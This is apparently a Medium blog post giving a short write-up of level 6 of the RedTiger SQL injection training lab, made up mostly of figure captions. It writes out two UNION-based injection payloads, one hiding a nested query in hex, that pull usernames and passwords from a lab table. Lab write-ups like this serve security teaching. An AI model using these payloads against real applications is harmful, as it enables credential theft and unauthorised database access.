SQL INJECTION(redtiger.lab)-Part 5

fig 1: Interface of the level 6
fig 2: Error when we send false query
fig 3: user not found
8 union select 1,‘ union select 1,2,3,4,5 from level6_users where status=1#,3,4,5 from level6_users where status=1 #
8 union select 1 ,0x2720756e696f6e2073656c65637420312c322c332c342c352066726f6d206c6576656c365f757365727320776865726520737461747573203d3123,3,4,5 from level6_users where status =1 #
fig 4: Identified column number from which data can be extracted
fig 5: username and password extracted

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
aayush malla

aayush malla

Data Engineer, Cybersecurity enthusiast , PLSQL, Data Analyst